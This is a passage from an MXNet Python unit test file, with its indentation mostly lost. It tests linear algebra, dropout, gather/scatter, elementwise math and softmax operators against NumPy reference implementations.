u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
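# NumPy reference for the syevd backward pass. With the rows of u being the
# eigenvectors and G = grad_u * u^T, the gradient w.r.t. the (symmetric) input
# is u^T * M * u, where M carries grad_l on its diagonal and
# M[i, j] = (G[i, j] - G[j, i]) / (2 * (l[i] - l[j])) off the diagonal.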
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
                    # test extraction of the triangle by doing a full round trip, since the
                    # intermediate extracted triangle is ordered differently than numpy's.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Sanity check on the test data: the input must not contain any zeros
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative error of the sums should be within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
                assert (get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
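# NumPy reference for smooth_l1 with parameter sigma:
# f(x) = 0.5 * (sigma * x)^2 if |x| < 1 / sigma^2, else |x| - 0.5 / sigma^2,
# with its derivative defined right after.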
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
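        # Gradient of softmax cross-entropy w.r.t. the logits: softmax(x) - one_hot(label)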
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
